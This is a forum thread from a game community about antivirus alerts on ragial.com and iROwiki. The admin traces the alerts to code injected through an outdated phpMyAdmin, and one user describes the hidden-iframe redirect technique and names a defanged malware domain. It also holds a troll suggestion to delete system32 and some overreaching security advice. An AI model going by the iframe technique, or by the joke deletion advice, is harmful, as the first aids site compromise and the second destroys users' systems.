69 replies to this topic

[Kalandros]

My ESET is going off and blocking me access to Ragial.com stating there's a Trojan installed on it (possibly hacked into - its happened on many other sites before with any small security flaw).

Threat: JS/Iframe.DK trojan

[Superpass]

I just went to ragial.com (after having the tab open for hours, mind you) and VIPRE had a pop up saying:

"A known bad file was blocked from opening:
Program:
E4D6Bd01 (Exploit)"

It was attempting to modify the MD5 219a8faed9a602aba91f687fff019019, threat ID 4755606.

EDIT: Currently I am in the middle of a deep scan, I will let you know if I find anything interesting.

Edited by Superpass, 23 May 2012 - 09:22 PM.

[Balthi]

That's odd. I just had a conversation about the iROwiki setting off my antivirus as well. Oh dear...

[Apocalis]

same probs with my virenprog
its odd

[Kalandros]

more headache for GM team if people without enough security are infected eh~

[Sully]

its the same for Irowiki database

[Balthi]

The best solution would probably be to take down both sites until the problems are fixed. The only factor is time -- dunno if the people who need to know are online at the moment, or not.

EDIT:

My antivirus ended up labeling whatever's in the wiki a Blackhole Exploit Kit. Woo.

Edited by Balthi, 23 May 2012 - 09:33 PM.

[Ralis]

I'm not coming up with anything, but looks like ragial and irowiki are down now.

[Faolain]

Make sure to get some sort of Adblock addon for your browser. Sometimes information harvesting companies will inject viruses into ads that the computer tries to download.

I was on Ragial earlier, but only on Chrome, and I didn't get any popup. I have Adblock enabled.

Anyway please do post the results of the scan. And thanks for the heads up.

[Superpass]

Will do. I am also using Adblock+ for Firefox.

[Bascojiin]

Time for another Forced Password Change I assume if you get an Trojaner via iRO wiki the Trojaner will look for your RO Passwords

Here is a small guide what I do when my Antivirus detects a Trojaner:

1. Save all needed files which I really dont want to lose and dont have an backup yet such as Pictures and stuff
2. Format C:/ completely => Delete Windows!
3. Install Windows
4. Install Security Stuff
5. Update Windows & Security Stuff
6. Re-implement all the stuff I need and Install games, ect.
7. Deep System Scans of all security programms
8. Scandisk & Defrag of C:
9. Another Deep System Scan
BETWEEN STEP 6 & 9 => Change all my Passwords to NEW(!!!) Passwords which have not been used yet. I think an real life notepad is OKAY to write PW's down, you may want to write them down in another system you can recognize like PASSWORD => DROWSSAP or something just in case someone breaks into your house, steals your Notepad and is a RO Player
Remember: HAVING A NOTEPAD WITH PASSWORDS ON YOUR COMPUTER IS AN ABSOLUTELY NO GO!!!!
(Bad Programs may check for .txt files on your Desktop or much used Files just to check if such a Password.txt file exist!)
----

In my opinon, if you get a trojaner it is always safer to just delete Windows and install it new cause you never know if there might be something hidden...

Edited by Bascojiin, 24 May 2012 - 12:20 AM.

[Blueness]

There's really no need for that sort of panic unless you're running on a 10 year old machine that has never had a security update!

In any case, problem has been identified and is in the process of being fixed. It is clever enough to avoid being activated while you're using Chrome (which is why I didn't figure it out at first), Firefox just spit out an encoding error and IE 404'd and passed a webpage off to MSSE which ate it.

(Moral of the story, don't use IE!)

Feel free to run scans but I don't think it'll go much further than your temp folder. Clear your cache etc.

[Bascojiin]

There's really no need for that sort of panic unless you're running on a 10 year old machine that has never had a security update!

In any case, problem has been identified and is in the process of being fixed. It is clever enough to avoid being activated while you're using Chrome (which is why I didn't figure it out at first), Firefox just spit out an encoding error and IE 404'd and passed a webpage off to MSSE which ate it.

(Moral of the story, don't use IE!)

Feel free to run scans but I don't think it'll go much further than your temp folder. Clear your cache etc.

So you got hacked I assume?
Did any files got compromised such as the User Database off iRO Wiki or iRO Wiki Forums? Just asking cause we all know some really smart people use their Username/ Password on every site

[Superpass]

Bluedreams is right, you really shouldn't go about reinstalling your OS every time an antivirus spits out a warning. Clearing out your temp files and your cache is a good idea, and running a virus scan with your AV of choice, and running Malwarebytes isn't a bad idea either. That being said, I ran Malwarebytes and came up with nothing, and my current scan with VIRPE is coming up with nothing as well. If you are running a decent AV, you should be fine with this one. We aren't talking about the next Iloveyou, or Melissa here.

Just scan your computer, and if you are feeling a little paranoid change your passwords. And as always, this is a good time to remind you to use different passwords for each site, and don't store them on your computer.

[fong]

I play it with computer server,but its look like nothing happen with the firewall and anti virus and anti hack alert <.< so ,not every1 gone got atcking from that trojan??

[Balthi]

I play it with computer server,but its look like nothing happen with the firewall and anti virus and anti hack alert <.< so ,not every1 gone got atcking from that trojan??

The trojan seems to only be attached to the iROwiki and ragial. The game itself shouldn't give you any trouble. It wasn't the game that had any issues.

[Blueness]

Some glitch in an old version of phpmyadmin that was running on a website I host (think 5+ years old) allowed code to be injected which tried to redirect the initial website request to another website to download malware.

Modern security software, working as intended, blocked anything from really happening on your side. Firefox simply failed with an encoding error, IE tried to redirect to the bad website and was halted by a combination of protections.

Whoever made the malware was smart enough to bypass chrome completely so google couldn't pick up on it! (meaning, if you use chrome, the bad code never ran)

No user data on the irowiki side was compromised. The only compromise, as I said before would be if you were running an ancient version of windows xp with no security software.


http://www.microsoft...Name=JS/Blacole

Long story short, if Windows, Java, and Adobe Reader are up to date, nothing will happen

Edited by Bluedreams, 24 May 2012 - 01:16 AM.

[TrashBag]

while we're at it, Please delete ur sys32.

[Heart]

Time for another Forced Password Change I assume if you get an Trojaner via iRO wiki the Trojaner will look for your RO Passwords

Here is a small guide what I do when my Antivirus detects a Trojaner:

1. Save all needed files which I really dont want to lose and dont have an backup yet such as Pictures and stuff
2. Format C:/ completely => Delete Windows!
3. Install Windows
4. Install Security Stuff
5. Update Windows & Security Stuff
6. Re-implement all the stuff I need and Install games, ect.
7. Deep System Scans of all security programms
8. Scandisk & Defrag of C:
9. Another Deep System Scan
BETWEEN STEP 6 & 9 => Change all my Passwords to NEW(!!!) Passwords which have not been used yet. I think an real life notepad is OKAY to write PW's down, you may want to write them down in another system you can recognize like PASSWORD => DROWSSAP or something just in case someone breaks into your house, steals your Notepad and is a RO Player
Remember: HAVING A NOTEPAD WITH PASSWORDS ON YOUR COMPUTER IS AN ABSOLUTELY NO GO!!!!
(Bad Programs may check for .txt files on your Desktop or much used Files just to check if such a Password.txt file exist!)
----

In my opinon, if you get a trojaner it is always safer to just delete Windows and install it new cause you never know if there might be something hidden...

i have a notepad...on the laptop i dont connect internet =)

[Superpass]

Just finished scanning my entire system with multiple methods. Absolutely nothing of interest to report, if you have recent security patches and a modern AV installed then you have absolutely nothing to worry about.

[Blueness]

I won't be able to fix the problem tonight as I'm waiting on a file transfer anyway, so the server is going to stay down while I get a little shut eye. I'll keep you posted!

[Bascojiin]

But... but.. I CANT LIVE WITHOUT iRO QUEST GUIDE!!!! ARGH *kills herself*

[Blueness]

Actually it is back up, some things may be broken like file uploads... please report any malware too.

Good night!

[BoingBoing]

Some glitch in an old version of phpmyadmin that was running on a website I host (think 5+ years old) allowed code to be injected which tried to redirect the initial website request to another website to download malware.

Modern security software, working as intended, blocked anything from really happening on your side. Firefox simply failed with an encoding error, IE tried to redirect to the bad website and was halted by a combination of protections.

Whoever made the malware was smart enough to bypass chrome completely so google couldn't pick up on it! (meaning, if you use chrome, the bad code never ran)

No user data on the irowiki side was compromised. The only compromise, as I said before would be if you were running an ancient version of windows xp with no security software.


http://www.microsoft...Name=JS/Blacole

Long story short, if Windows, Java, and Adobe Reader are up to date, nothing will happen

This is not a new trick, but it is nifty. If you look at the source, the javascript at the top of the ragial uses document.write to create an 10x10 invisible iframe. It then inserts the created div into the body. The actual src leads to http drjdrdjgyiuu myfw us. (malware infested, so .'s replaced with smiley)
As to why it "bypassed" chrome, it didn't. It's the other way round. Just take a look at the actual script and where it is placed, and you'll see why it didn't load on webkit based browsers.
If you think about this sort of attacks, it really isn't effective. Modern antivrus software that scans http streams will recognize the js code, and catch it even before the page loads, and therefore even before it has a chance to insert the iframe, (the js code calls out <body> by id, so it can only run after everything before </body> has been loaded). This probably resulted in firefox giving out 404's.
Interestingly, with the newest firefox nightly, sandboxed iframes are introduced, which should annihilate this sort of malicious attacks, if web devs choose to implement it.

[BoingBoing]

That is to say, you haven't taken out the malicious code at all, the exploit is still live on ragial.com.